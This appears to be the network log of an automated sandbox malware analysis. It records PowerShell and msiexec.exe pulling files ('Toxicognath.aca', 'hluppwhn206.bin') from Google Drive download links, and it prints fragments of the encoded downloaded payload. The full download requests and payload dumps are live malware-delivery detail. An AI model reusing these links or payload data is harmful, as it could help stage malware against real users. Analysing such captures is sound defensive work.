                                                                Date: Thu, 24 Oct 2024 06:43:35 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 106
                                                                Connection: keep-alive
                                                                Cache-Control: no-cache
                                                                Pragma: no-cache
                                                                X-Request-ID: 88499bd08991df9c9762e7e832fd2ffa
                                                                Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.71</body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.449730142.250.185.784433300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-24 06:42:26 UTC215OUTGET /uc?export=download&id=1OucVAKucyFgsylE0-RU3uZkNde2alMJP HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Connection: Keep-Alive
                                                                2024-10-24 06:42:26 UTC1610INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Thu, 24 Oct 2024 06:42:26 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1OucVAKucyFgsylE0-RU3uZkNde2alMJP&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'nonce-9Y9bqgnTr6peGKbWF3lmgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.449731142.250.185.784433300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-24 06:42:31 UTC121OUTGET /uc?export=download&id=1OucVAKucyFgsylE0-RU3uZkNde2alMJP HTTP/1.1
                                                                Host: drive.google.com
                                                                Connection: Keep-Alive
                                                                2024-10-24 06:42:31 UTC1319INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Thu, 24 Oct 2024 06:42:31 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1OucVAKucyFgsylE0-RU3uZkNde2alMJP&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-Sw9mpEn5mU155-j2-KxiZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.449732142.250.185.654433300C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-24 06:42:32 UTC139OUTGET /download?id=1OucVAKucyFgsylE0-RU3uZkNde2alMJP&export=download HTTP/1.1
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                2024-10-24 06:42:36 UTC4917INHTTP/1.1 200 OK
                                                                Content-Type: application/octet-stream
                                                                Content-Security-Policy: sandbox
                                                                Content-Security-Policy: default-src 'none'
                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                X-Content-Security-Policy: sandbox
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                Cross-Origin-Resource-Policy: same-site
                                                                X-Content-Type-Options: nosniff
                                                                Content-Disposition: attachment; filename="Toxicognath.aca"
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Credentials: false
                                                                Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                Accept-Ranges: bytes
                                                                Content-Length: 451208
                                                                Last-Modified: Wed, 23 Oct 2024 11:01:42 GMT
                                                                X-GUploader-UploadID: AHmUCY3Sns8CMoaFfQvmA-AnEYTsW3MuLUWRyQPG_lWxRpPs5hPMy8xjM_5mXD14SObmzoZZ1j2BRVzH7A
                                                                Date: Thu, 24 Oct 2024 06:42:35 GMT
                                                                Expires: Thu, 24 Oct 2024 06:42:35 GMT
                                                                Cache-Control: private, max-age=0
                                                                X-Goog-Hash: crc32c=WpecLg==
                                                                Server: UploadServer
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close
                                                                2024-10-24 06:42:36 UTC4917INData Raw: 36 77 4c 4a 4c 58 45 42 6d 37 75 38 56 42 67 41 36 77 4b 33 51 33 45 42 6d 77 4e 63 4a 41 52 78 41 5a 76 72 41 6f 34 67 75 54 2b 4c 6d 2f 52 78 41 5a 76 72 41 71 4f 76 67 63 48 63 37 52 37 51 63 51 47 62 63 51 47 62 67 65 6b 62 65 62 72 45 63 51 47 62 36 77 4a 66 37 2b 73 43 78 79 5a 78 41 5a 75 36 4c 4f 79 36 4d 4f 73 43 57 6e 48 72 41 6f 79 49 36 77 4a 44 41 58 45 42 6d 7a 48 4b 63 51 47 62 63 51 47 62 69 52 51 4c 63 51 47 62 36 77 4c 6e 4d 39 48 69 63 51 47 62 36 77 49 42 54 34 50 42 42 48 45 42 6d 2b 73 43 67 53 79 42 2b 51 51 65 33 51 52 38 7a 4f 73 43 6e 4e 68 78 41 5a 75 4c 52 43 51 45 36 77 4a 42 61 58 45 42 6d 34 6e 44 63 51 47 62 36 77 49 76 49 49 48 44 63 49 64 31 41 6e 45 42 6d 33 45 42 6d 37 72 6e 67 2f 4f 74 63 51 47 62 63 51 47 62 67 66 4a
                                                                Data Ascii: 6wLJLXEBm7u8VBgA6wK3Q3EBmwNcJARxAZvrAo4guT+Lm/RxAZvrAqOvgcHc7R7QcQGbcQGbgekbebrEcQGb6wJf7+sCxyZxAZu6LOy6MOsCWnHrAoyI6wJDAXEBmzHKcQGbcQGbiRQLcQGb6wLnM9HicQGb6wIBT4PBBHEBm+sCgSyB+QQe3QR8zOsCnNhxAZuLRCQE6wJBaXEBm4nDcQGb6wIvIIHDcId1AnEBm3EBm7rng/OtcQGbcQGbgfJ
                                                                2024-10-24 06:42:36 UTC4863INData Raw: 55 43 34 76 64 69 75 44 76 68 30 63 61 56 6a 42 57 7a 6b 55 63 31 6b 61 49 68 71 58 4f 65 4d 55 49 6d 35 53 4e 34 58 34 6a 35 2b 69 72 54 5a 30 2f 45 59 6e 55 68 41 51 78 37 31 32 55 79 61 59 6c 52 44 48 71 2b 45 41 53 32 54 52 79 76 33 54 41 72 61 54 6b 30 75 56 4d 6b 2b 32 64 31 62 56 57 74 75 79 57 46 45 46 79 75 6e 6f 59 33 70 66 4f 53 4f 37 44 72 75 72 45 51 43 71 44 55 7a 6c 30 6c 54 49 69 48 56 79 63 49 44 51 71 63 77 6b 43 6e 6e 45 47 42 57 77 66 6b 47 72 64 6c 38 35 47 68 46 77 45 69 35 63 63 61 74 62 58 63 36 74 32 6e 57 36 6e 54 59 5a 2f 6d 6a 59 7a 31 4e 54 6a 69 77 63 7a 78 74 73 4a 4b 30 50 50 75 66 42 6c 6f 6b 43 66 78 74 67 46 4b 2f 37 49 69 66 42 6e 47 36 74 62 5a 6c 55 4f 67 61 31 53 4a 49 70 55 51 6c 55 47 4e 43 76 41 63 4b 35 39 32 4e
                                                                Data Ascii: UC4vdiuDvh0caVjBWzkUc1kaIhqXOeMUIm5SN4X4j5+irTZ0/EYnUhAQx712UyaYlRDHq+EAS2TRyv3TAraTk0uVMk+2d1bVWtuyWFEFyunoY3pfOSO7DrurEQCqDUzl0lTIiHVycIDQqcwkCnnEGBWwfkGrdl85GhFwEi5ccatbXc6t2nW6nTYZ/mjYz1NTjiwczxtsJK0PPufBlokCfxtgFK/7IifBnG6tbZlUOga1SJIpUQlUGNCvAcK592N
                                                                2024-10-24 06:42:36 UTC1378INData Raw: 39 56 4d 79 64 4d 5a 4c 52 4b 6e 4d 4e 42 69 61 50 72 51 53 6c 58 6a 65 51 52 37 31 34 34 51 68 2b 75 78 44 48 76 58 73 51 78 37 31 37 45 4d 65 39 65 78 44 69 72 4e 39 72 71 43 57 58 47 58 70 76 4e 52 63 6b 6b 4c 31 55 37 33 53 6e 38 63 69 4f 62 51 43 68 32 79 58 70 38 66 67 31 43 33 53 79 61 74 62 73 6b 49 70 64 74 59 59 78 49 4d 67 77 57 7a 74 78 74 68 69 76 6f 4d 4d 43 61 77 6b 4f 67 74 4c 30 58 6e 4e 73 72 6b 4b 4d 45 2b 31 67 6b 50 69 6c 32 68 7a 51 68 37 31 5a 62 68 4e 66 6e 48 63 48 2f 58 73 6a 37 4e 75 51 73 79 6f 59 75 78 76 30 5a 44 53 76 64 67 7a 31 5a 42 36 63 32 4e 46 38 76 51 38 35 70 47 4f 59 64 65 66 59 64 77 72 41 34 78 43 51 70 2f 42 79 4c 51 37 4f 52 31 4d 48 2b 32 72 51 78 37 31 37 45 4d 65 39 65 78 44 48 76 58 73 51 78 35 6d 31 32 45
                                                                Data Ascii: 9VMydMZLRKnMNBiaPrQSlXjeQR7144Qh+uxDHvXsQx717EMe9exDirN9rqCWXGXpvNRckkL1U73Sn8ciObQCh2yXp8fg1C3SyatbskIpdtYYxIMgwWztxthivoMMCawkOgtL0XnNsrkKME+1gkPil2hzQh71ZbhNfnHcH/Xsj7NuQsyoYuxv0ZDSvdgz1ZB6c2NF8vQ85pGOYdefYdwrA4xCQp/ByLQ7OR1MH+2rQx717EMe9exDHvXsQx5m12E
                                                                2024-10-24 06:42:36 UTC1378INData Raw: 4f 38 34 54 6b 67 77 36 4f 50 35 34 5a 38 45 6f 66 72 6e 71 52 55 70 6f 50 72 4f 50 45 57 66 6e 46 72 48 2f 58 73 54 43 78 53 78 6b 4d 65 39 65 78 44 48 76 58 73 51 78 37 31 37 45 4d 65 64 74 6b 65 53 50 48 41 2f 54 33 4d 6a 6a 5a 47 64 4a 51 72 37 74 41 49 36 35 65 74 36 59 38 49 2f 7a 69 58 59 70 78 41 35 67 48 75 51 77 41 7a 6c 46 36 5a 2b 6b 57 4a 61 75 63 79 72 30 38 63 39 65 78 44 53 45 76 4b 6a 44 79 4a 62 62 57 38 42 6d 48 6e 6e 7a 4d 72 63 45 2f 53 5a 55 55 66 49 41 39 76 61 74 68 67 79 61 41 4b 75 66 77 46 44 41 43 45 6e 77 51 33 56 74 42 2b 6b 35 72 72 2f 47 4b 67 77 43 76 73 6e 49 53 78 5a 64 6f 4e 71 2b 4e 44 44 58 76 73 51 78 37 31 37 45 4d 65 39 65 78 44 48 76 58 73 51 35 53 73 4f 49 7a 4f 68 7a 34 70 62 74 6e 44 76 42 32 4d 59 59 50 63 6b
                                                                Data Ascii: O84Tkgw6OP54Z8EofrnqRUpoPrOPEWfnFrH/XsTCxSxkMe9exDHvXsQx717EMedtkeSPHA/T3MjjZGdJQr7tAI65et6Y8I/ziXYpxA5gHuQwAzlF6Z+kWJaucyr08c9exDSEvKjDyJbbW8BmHnnzMrcE/SZUUfIA9vathgyaAKufwFDACEnwQ3VtB+k5rr/GKgwCvsnISxZdoNq+NDDXvsQx717EMe9exDHvXsQ5SsOIzOhz4pbtnDvB2MYYPck
                                                                2024-10-24 06:42:36 UTC1378INData Raw: 31 50 4f 69 4b 37 34 54 58 46 53 57 55 6d 31 33 4f 72 4e 72 61 4c 77 4b 6d 57 64 34 2b 69 74 79 48 76 58 73 51 78 37 31 37 45 4d 65 39 65 78 44 48 76 56 36 36 6f 78 43 2f 30 7a 71 43 53 6e 62 51 49 76 43 57 6f 67 47 48 45 2f 65 76 31 56 5a 4d 4d 4c 54 32 57 4d 77 74 57 52 32 42 33 4b 2b 35 54 6d 65 67 75 57 4e 5a 4f 34 76 64 39 57 49 54 68 33 7a 4e 2f 72 41 31 66 49 46 45 6e 50 43 53 45 76 55 6a 51 43 4d 62 62 55 66 2f 6c 4f 32 6e 7a 4d 72 65 45 43 47 75 39 2b 58 45 75 31 30 67 33 45 2f 4f 54 37 68 53 79 30 77 7a 73 76 31 34 5a 4d 30 50 48 32 47 69 59 34 4a 64 36 6d 4a 66 55 59 2f 6b 57 44 55 44 2f 6e 6c 4d 71 39 47 55 59 73 51 65 2f 75 71 62 62 67 43 41 74 46 5a 51 48 54 41 5a 2f 67 37 7a 55 6d 66 77 63 67 33 6e 6a 36 36 45 71 63 67 38 48 6c 66 64 42 32
                                                                Data Ascii: 1POiK74TXFSWUm13OrNraLwKmWd4+ityHvXsQx717EMe9exDHvV66oxC/0zqCSnbQIvCWogGHE/ev1VZMMLT2WMwtWR2B3K+5TmeguWNZO4vd9WITh3zN/rA1fIFEnPCSEvUjQCMbbUf/lO2nzMreECGu9+XEu10g3E/OT7hSy0wzsv14ZM0PH2GiY4Jd6mJfUY/kWDUD/nlMq9GUYsQe/uqbbgCAtFZQHTAZ/g7zUmfwcg3nj66Eqcg8HlfdB2
                                                                2024-10-24 06:42:36 UTC1378INData Raw: 57 63 2f 30 64 65 45 35 77 57 2f 5a 74 51 2b 4c 35 4a 30 2b 5a 32 53 45 67 6f 70 46 56 30 73 55 50 6d 77 75 2f 49 6a 78 6f 7a 64 42 30 35 31 74 4f 55 77 75 2b 46 36 59 70 42 70 58 44 4b 2f 76 54 6b 33 6e 68 77 49 7a 34 45 46 4d 62 54 69 50 58 6a 44 47 57 2b 64 4e 68 63 52 62 62 4a 4b 55 33 65 4c 30 45 6f 6c 78 6e 4d 7a 69 53 71 79 77 32 30 77 75 65 44 69 47 63 37 72 47 66 4f 6d 76 58 73 51 36 54 4b 31 74 43 79 4f 53 38 49 39 56 43 4a 57 4a 71 57 70 30 4f 79 38 51 62 6d 64 74 51 4a 31 47 4c 36 31 2b 4a 30 64 52 50 32 4c 4e 6e 79 63 55 39 65 30 6f 64 76 47 42 30 38 73 4f 77 66 59 38 2f 65 4b 61 73 64 2f 51 52 67 57 50 48 73 71 68 62 77 37 45 4e 46 78 44 37 4b 6b 35 2f 75 51 78 35 38 50 52 4a 50 54 43 52 32 43 52 42 74 73 6e 39 62 76 45 4b 66 48 44 79 59 31
                                                                Data Ascii: Wc/0deE5wW/ZtQ+L5J0+Z2SEgopFV0sUPmwu/IjxozdB051tOUwu+F6YpBpXDK/vTk3nhwIz4EFMbTiPXjDGW+dNhcRbbJKU3eL0EolxnMziSqyw20wueDiGc7rGfOmvXsQ6TK1tCyOS8I9VCJWJqWp0Oy8QbmdtQJ1GL61+J0dRP2LNnycU9e0odvGB08sOwfY8/eKasd/QRgWPHsqhbw7ENFxD7Kk5/uQx58PRJPTCR2CRBtsn9bvEKfHDyY1
                                                                2024-10-24 06:42:36 UTC1378INData Raw: 78 75 57 4d 34 67 62 72 78 6f 47 58 38 64 71 39 76 67 30 72 72 49 2b 76 37 75 44 7a 59 6c 6e 51 65 2b 6d 74 61 4c 31 46 64 42 30 65 6a 2f 53 51 45 36 5a 68 77 63 66 63 77 4c 57 76 34 32 44 5a 39 48 63 78 6a 30 59 37 52 31 4c 6f 4b 32 71 33 50 2f 36 6d 63 4d 72 39 39 4f 2f 65 6d 69 53 51 52 4e 43 54 79 4d 36 58 36 48 52 4b 66 47 78 41 4e 37 46 4f 49 71 4b 67 71 63 6f 65 67 70 4f 4b 65 73 61 75 62 62 7a 2b 48 33 42 43 52 6e 51 46 4b 65 70 41 56 45 77 66 42 62 64 44 48 76 58 73 51 78 37 31 37 45 4d 65 39 65 78 44 48 6e 6a 52 6a 70 33 39 79 51 4f 51 53 52 43 4f 65 6a 34 4b 79 39 66 56 6d 75 72 4f 45 76 6b 49 69 34 68 74 73 74 58 54 54 35 64 4d 54 38 37 32 4e 67 35 74 73 65 45 72 67 54 53 66 42 2b 50 53 5a 52 42 74 71 66 6a 2b 30 69 71 58 78 37 47 6e 30 30 5a
                                                                Data Ascii: xuWM4gbrxoGX8dq9vg0rrI+v7uDzYlnQe+mtaL1FdB0ej/SQE6ZhwcfcwLWv42DZ9Hcxj0Y7R1LoK2q3P/6mcMr99O/emiSQRNCTyM6X6HRKfGxAN7FOIqKgqcoegpOKesaubbz+H3BCRnQFKepAVEwfBbdDHvXsQx717EMe9exDHnjRjp39yQOQSRCOej4Ky9fVmurOEvkIi4htstXTT5dMT872Ng5tseErgTSfB+PSZRBtqfj+0iqXx7Gn00Z
                                                                2024-10-24 06:42:36 UTC1378INData Raw: 37 45 35 5a 46 6c 59 49 62 6b 62 35 4f 58 36 4c 2b 55 64 4c 74 4e 4f 55 4f 46 44 4b 56 63 50 39 74 63 4e 63 43 33 4c 72 46 5a 37 44 67 59 62 6a 72 43 74 63 71 54 74 75 35 44 48 6b 77 6d 59 79 67 38 47 41 45 59 33 2b 78 44 48 76 58 73 51 78 37 31 37 45 4d 65 39 65 78 44 6e 45 62 57 74 53 66 75 57 68 4c 32 79 66 43 6f 48 46 41 71 50 54 31 62 62 62 4b 53 4a 31 74 36 53 45 73 64 38 43 65 31 62 62 57 4b 75 68 73 37 6e 77 4e 45 35 61 69 71 62 62 56 65 51 6b 64 7a 6e 7a 50 59 34 6a 4a 64 5a 56 31 4b 75 6c 32 4d 32 67 76 52 54 5a 4b 74 53 6a 51 74 51 76 41 6a 72 78 49 59 6c 73 75 72 76 50 75 34 62 31 56 53 4b 33 41 58 62 72 48 41 58 54 46 2f 35 39 6e 52 44 41 42 41 45 6f 4a 38 44 55 6f 66 61 4e 53 52 61 65 4c 45 56 75 2b 76 52 44 4e 57 77 47 4e 77 52 49 56 49 74
                                                                Data Ascii: 7E5ZFlYIbkb5OX6L+UdLtNOUOFDKVcP9tcNcC3LrFZ7DgYbjrCtcqTtu5DHkwmYyg8GAEY3+xDHvXsQx717EMe9exDnEbWtSfuWhL2yfCoHFAqPT1bbbKSJ1t6SEsd8Ce1bbWKuhs7nwNE5aiqbbVeQkdznzPY4jJdZV1Kul2M2gvRTZKtSjQtQvAjrxIYlsurvPu4b1VSK3AXbrHAXTF/59nRDABAEoJ8DUofaNSRaeLEVu+vRDNWwGNwRIVIt
                                                                2024-10-24 06:42:36 UTC1378INData Raw: 7a 2b 6f 63 6b 47 58 47 57 50 66 73 51 30 68 4c 36 2b 2b 65 37 57 32 31 46 69 2b 4e 50 5a 38 7a 76 57 49 42 62 47 56 56 44 49 58 36 4d 72 43 36 4c 53 37 42 4c 33 31 33 75 45 56 5a 50 61 42 51 47 62 52 6b 2f 4c 4c 37 31 6d 63 72 43 52 45 79 30 75 6f 65 39 65 78 44 48 76 58 73 51 78 37 31 37 45 4d 65 39 56 46 62 43 4d 68 4c 69 45 59 55 6a 52 4f 6d 35 59 74 4e 38 63 43 58 75 46 57 31 32 5a 39 38 68 35 52 47 56 2f 63 6b 61 30 31 70 5a 61 41 66 39 6e 46 36 78 59 54 67 73 6b 39 5a 44 61 6a 48 76 33 7a 45 76 7a 4f 4c 59 63 46 7a 46 63 4b 35 75 53 58 4d 32 48 6a 54 47 43 46 6d 6b 6b 37 4f 4e 63 6b 6f 39 79 6a 74 61 70 6f 6e 74 38 4a 6a 67 55 53 2f 48 76 58 6a 78 78 78 2b 37 45 4e 47 32 4b 53 35 41 63 72 5a 6e 51 43 4a 71 49 39 68 77 78 4a 68 47 5a 58 54 77 39 36
                                                                Data Ascii: z+ockGXGWPfsQ0hL6++e7W21Fi+NPZ8zvWIBbGVVDIX6MrC6LS7BL313uEVZPaBQGbRk/LL71mcrCREy0uoe9exDHvXsQx717EMe9VFbCMhLiEYUjROm5YtN8cCXuFW12Z98h5RGV/cka01pZaAf9nF6xYTgsk9ZDajHv3zEvzOLYcFzFcK5uSXM2HjTGCFmkk7ONcko9yjtapont8JjgUS/HvXjxxx+7ENG2KS5AcrZnQCJqI9hwxJhGZXTw96
                                                                2024-10-24 06:42:36 UTC1378INData Raw: 59 7a 64 43 36 50 49 43 4b 49 79 68 78 2b 68 78 4b 71 4b 39 2f 4e 39 37 33 38 5a 37 76 38 55 4c 47 76 59 73 58 6b 76 49 4e 6f 52 45 53 50 47 75 65 6f 44 44 63 35 64 45 46 70 53 55 69 4d 61 65 38 48 2b 77 66 7a 58 46 47 4b 63 6b 52 4f 56 48 52 42 54 47 32 77 53 42 52 54 47 45 31 4f 67 4d 56 77 4b 47 32 77 47 75 75 37 33 70 38 65 33 4c 48 58 79 6d 32 77 4a 4d 7a 42 75 5a 38 47 37 74 31 63 44 37 37 66 6c 78 66 6c 57 59 50 4d 46 6a 6f 4a 38 55 76 6b 57 73 58 77 4a 51 33 50 50 74 30 62 56 6a 49 39 6b 6b 33 49 75 51 56 50 36 6c 72 38 37 65 75 45 6f 4a 4e 70 6b 6b 54 4e 47 42 69 66 42 6b 48 34 7a 72 2b 36 2f 59 57 4a 33 35 6d 66 41 35 7a 6b 52 31 56 74 68 62 45 33 49 74 71 66 47 2f 52 37 4a 2b 46 6c 54 61 38 77 79 6a 51 75 68 43 6e 47 65 5a 38 54 6e 51 4f 72 72
                                                                Data Ascii: YzdC6PICKIyhx+hxKqK9/N9738Z7v8ULGvYsXkvINoRESPGueoDDc5dEFpSUiMae8H+wfzXFGKckROVHRBTG2wSBRTGE1OgMVwKG2wGuu73p8e3LHXym2wJMzBuZ8G7t1cD77flxflWYPMFjoJ8UvkWsXwJQ3PPt0bVjI9kk3IuQVP6lr87euEoJNpkkTNGBifBkH4zr+6/YWJ35mfA5zkR1VthbE3ItqfG/R7J+FlTa8wyjQuhCnGeZ8TnQOrr


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.449741216.58.206.784435496C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-24 06:43:16 UTC216OUTGET /uc?export=download&id=1UFq7IEKIZcVBH3MHn7RsN9JKGyqRUmUY HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Host: drive.google.com
                                                                Cache-Control: no-cache
                                                                2024-10-24 06:43:16 UTC1610INHTTP/1.1 303 See Other
                                                                Content-Type: application/binary
                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                Pragma: no-cache
                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                Date: Thu, 24 Oct 2024 06:43:16 GMT
                                                                Location: https://drive.usercontent.google.com/download?id=1UFq7IEKIZcVBH3MHn7RsN9JKGyqRUmUY&export=download
                                                                Strict-Transport-Security: max-age=31536000
                                                                Content-Security-Policy: script-src 'nonce-ZaquxqtEvHz-ugA7fMSmFQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                Server: ESF
                                                                Content-Length: 0
                                                                X-XSS-Protection: 0
                                                                X-Frame-Options: SAMEORIGIN
                                                                X-Content-Type-Options: nosniff
                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.449747142.250.185.654435496C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-24 06:43:17 UTC258OUTGET /download?id=1UFq7IEKIZcVBH3MHn7RsN9JKGyqRUmUY&export=download HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                Cache-Control: no-cache
                                                                Host: drive.usercontent.google.com
                                                                Connection: Keep-Alive
                                                                2024-10-24 06:43:20 UTC4917INHTTP/1.1 200 OK
                                                                Content-Type: application/octet-stream
                                                                Content-Security-Policy: sandbox
                                                                Content-Security-Policy: default-src 'none'
                                                                Content-Security-Policy: frame-ancestors 'none'
                                                                X-Content-Security-Policy: sandbox
                                                                Cross-Origin-Opener-Policy: same-origin
                                                                Cross-Origin-Embedder-Policy: require-corp
                                                                Cross-Origin-Resource-Policy: same-site
                                                                X-Content-Type-Options: nosniff
                                                                Content-Disposition: attachment; filename="hluppwhn206.bin"
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Allow-Credentials: false
